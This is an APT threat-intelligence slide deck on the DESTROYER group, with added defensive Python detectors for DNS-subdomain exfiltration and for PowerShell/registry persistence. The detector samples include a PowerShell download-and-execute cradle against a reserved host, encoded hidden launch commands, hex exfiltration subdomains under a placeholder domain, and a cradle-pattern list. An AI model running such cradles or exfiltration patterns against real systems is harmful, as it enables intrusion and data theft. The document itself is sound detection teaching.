DESTROYER: Why Intelligence Matters in InfoSec Operations
John Holland
Managed Adversary and Threat Intelligence (MATI)
Principal Cyber Intelligence Analyst

Outline
1. Why Intelligence Matters
2. Why APTs Matter
3. DESTROYER Overview
4. Applying Intelligence
Why Intelligence Matters
Increased temporal distance (each step is visible earlier than the last):
• MD5 Hash. Options: Monitoring/Detection + Incident Response
• Tool-based Probing. Options: Vulnerability Management + Perimeter Defense
• Global Reconnaissance. Options: Intelligence Operations (CI)

Why Understanding APTs Matters
• Develop leading Tactics, Techniques, and Procedures (TTPs)
• Operate with impunity
• TTPs proliferate
DESTROYER Overview
Sponsorship
• Almost certainly acting on behalf of the Vietnamese government (circa 2014)
Supporting Evidence
• Targeting political dissidents and domestic media
• Targeting foreign companies operating in country
• Targeting foreign companies in areas of strategic interest to Vietnam

DESTROYER Targeting
Targeted entities include:
• Political dissidents and media
• Foreign-government diplomatic posts
• Automotive manufacturing
• Financial institutions
• Educational institutions

DESTROYER Intentions
Focus
• Creating economic advantage
• Regional political maneuver
Supporting Evidence
• TTPs align with espionage-centric intent
• Custom backdoors allow for data exfiltration (DNS subdomains)
• Cobalt Strike “Malleable C2” supports covert data exfiltration
• Operations track with economic and political themes
• Supporting extraordinary due diligence
• Targets’ data not easily monetized

DNS Subdomain Exfiltration
<your data>.badguys.com
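The slide shows the exfiltration pattern only as a template. The following added example (not part of the deck, and not DESTROYER tooling) shows the defender's side: a small detector that reads DNS query logs and flags parent domains that receive many distinct, encoded-looking subdomains from one client. The log format, the client addresses and the queried names are all constructed for the example; "badguys.com" is used only because it is the placeholder on the slide, and the thresholds are assumptions to tune against your own resolver traffic.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log: "<timestamp> <client> <queried name>" per line.
# The hex labels under badguys.com carry a short text payload, which is what an
# exfiltration backdoor using DNS subdomains would look like in resolver logs.
SAMPLE_DNS_LOG = """\
2019-03-01T10:00:01Z 10.1.2.3 www.example.com
2019-03-01T10:00:02Z 10.1.2.3 mail.example.com
2019-03-01T10:00:03Z 10.1.2.4 4a6f686e20486f6c6c616e64.badguys.com
2019-03-01T10:00:04Z 10.1.2.4 2049732043796265722049.badguys.com
2019-03-01T10:00:05Z 10.1.2.4 6e74656c6c6967656e6365.badguys.com
2019-03-01T10:00:06Z 10.1.2.4 20416e616c797374204d41.badguys.com
2019-03-01T10:00:07Z 10.1.2.5 cdn.example.com
"""

LABEL_MAX = 30        # assumption: a single label longer than this is unusual
ENTROPY_MIN = 3.0     # assumption: bits/char above which a label looks random
HEX_RE = re.compile(r"^[0-9a-f]{16,}$")   # long, pure-hex label


def shannon_entropy(s):
    """Bits per character of the string; 0.0 for a repeated character."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Yield (timestamp, client, lowercased qname) for each well-formed line."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, client, qname = parts
        records.append((ts, client, qname.lower().rstrip(".")))
    return records


def split_name(qname):
    """Split into (subdomain labels, parent). Uses the last two labels as the
    parent, a simplification that ignores public-suffix rules such as co.uk."""
    labels = qname.split(".")
    if len(labels) < 3:
        return [], qname
    return labels[:-2], ".".join(labels[-2:])


def suspicious_labels(labels):
    """Reasons a set of subdomain labels looks like an encoded payload."""
    reasons = []
    for lab in labels:
        if len(lab) > LABEL_MAX:
            reasons.append("long label")
        if HEX_RE.match(lab):
            reasons.append("hex-encoded label")
        if shannon_entropy(lab) > ENTROPY_MIN:
            reasons.append("high entropy label")
    return reasons


def decode_hex_label(label):
    """Best-effort decode of a hex label so an analyst can see the payload."""
    if not HEX_RE.match(label):
        return None
    try:
        return bytes.fromhex(label).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def find_exfil(text, min_unique=3):
    """Return parents that received >= min_unique distinct suspicious subdomains."""
    per_parent = defaultdict(lambda: {"clients": set(), "subdomains": set(),
                                      "reasons": set()})
    for _ts, client, qname in parse_log(text):
        labels, parent = split_name(qname)
        if not labels:
            continue
        entry = per_parent[parent]
        entry["clients"].add(client)
        entry["subdomains"].add(".".join(labels))
        entry["reasons"].update(suspicious_labels(labels))
    return {p: e for p, e in per_parent.items()
            if e["reasons"] and len(e["subdomains"]) >= min_unique}


if __name__ == "__main__":
    for parent, entry in find_exfil(SAMPLE_DNS_LOG).items():
        print(parent, sorted(entry["clients"]), sorted(entry["reasons"]))
        for sub in sorted(entry["subdomains"]):
            print("  ", sub, "->", decode_hex_label(sub))
```

The fan-out rule (many distinct subdomains for one parent) is what separates exfiltration from the occasional long CDN hostname; the per-label checks only explain why a parent was flagged. Hex-encoded ASCII text scores surprisingly low on entropy because every second character comes from a small set, so the explicit hex test matters more than the entropy threshold for this kind of payload.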
Auto Manufacturing Activity
Noteworthy Observations
• Observed concerted focus on global automotive manufacturing (Dec 2018 to current)
• Targeted at least five auto manufacturers with regional operations
  • India, Germany, United States, Japan
• Coincides with ramp-up of domestic automobile manufacturing
Also noteworthy
• Massive domestic production of automobile parts
• No observed targeting to date

Identifying the Indicators
Technical/Tactical level
• IP addresses
• Domain/URL
• Hashes
Addressed by technology; easily changed (rapidly)
Operational level
• Reg keys
• PowerShell
• Scheduled tasks
Less “what”, more “how”; difficult and expensive to change
Strategic level
• Press releases
• Media statements
Maximum temporal distance; usually… highly visible

Applying the Intelligence
Operational
• Living Off the Land techniques on the rise
• PowerShell exploitation
  • Easily monitored with Windows logging capability
  • Requires activation and a monitoring schema
• Registry keys used for persistence
  • Registry keys are not standard in data feeds
  • Native Windows logging capability
Strategic
• Globally visible indicators
  • Press releases
  • Financial statements (forward looking)
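The slide says the operational-level indicators (PowerShell abuse, registry persistence) are easy to monitor once logging is switched on and a monitoring schema exists. The following added example (not from the deck) sketches such a schema: three detection rules run over Windows event records that a SIEM would normalise to dictionaries. The events assumed are Sysmon Event ID 13 (registry value set), Security Event ID 4688 (process creation with command-line auditing enabled) and PowerShell Event ID 4104 (script block logging); the field names, paths, URL and the sample records themselves are constructed for the example.

```python
import base64
import re


def encode_ps(script):
    """Build a PowerShell -EncodedCommand argument (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-two command as a backdoor might launch it. The host name
# example.invalid is reserved and never resolves.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"

# Constructed event records: two malicious, one script block, two benign.
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": "powershell.exe -w hidden -enc " + encode_ps(STAGE)},
    {"source": "Security", "id": 4688, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE)},
    {"source": "PowerShell", "id": 4104, "script_block": STAGE},
    {"source": "Sysmon", "id": 13, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"HKCU\Software\Microsoft\Office\16.0\Word\Options\Zoom",
     "details": "DWORD (0x00000064)"},
    {"source": "Security", "id": 4688, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

# Run and RunOnce keys are the classic registry persistence locations.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)
# Any accepted spelling of -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-cradle fragments that rarely appear in legitimate admin scripts.
LOTL_PATTERNS = ("invoke-expression", "iex ", "downloadstring", "frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded script of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_script(text):
    """Cradle patterns present in the (case-folded) text."""
    lowered = text.lower()
    return [p for p in LOTL_PATTERNS if p in lowered]


def evaluate(events):
    """Apply the three rules; return (event index, rule name, evidence) tuples."""
    findings = []
    for i, ev in enumerate(events):
        # Rule 1: registry persistence via Run/RunOnce keys.
        if ev["source"] == "Sysmon" and ev["id"] == 13 and RUN_KEY_RE.search(ev["target"]):
            findings.append((i, "registry-run-key-persistence", ev["target"]))
        text = ev.get("command_line") or ev.get("details") or ev.get("script_block") or ""
        # Rule 2: encoded PowerShell; decode it so rule 3 can see through it.
        decoded = decode_encoded_command(text)
        if decoded is not None:
            findings.append((i, "powershell-encoded-command", decoded))
            text = text + " " + decoded
        # Rule 3: download-cradle fragments in plain or decoded script text.
        hits = suspicious_script(text)
        if hits:
            findings.append((i, "powershell-download-cradle", ",".join(hits)))
    return findings


if __name__ == "__main__":
    for idx, rule, evidence in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {evidence[:70]}")
```

Decoding the -EncodedCommand blob before matching is the step that makes the cradle rule useful: the persistence entry and the 4688 record both look harmless until the UTF-16LE payload is unpacked, whereas the 4104 script block arrives already decoded because script block logging records what the engine actually ran.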
Closing Thoughts
• IOCs alone tell you you’re in trouble
• The wrong IOCs will let you know when it’s too late
• You may never be targeted by an APT

Thank You!
John Holland
john_holland@Symantec.com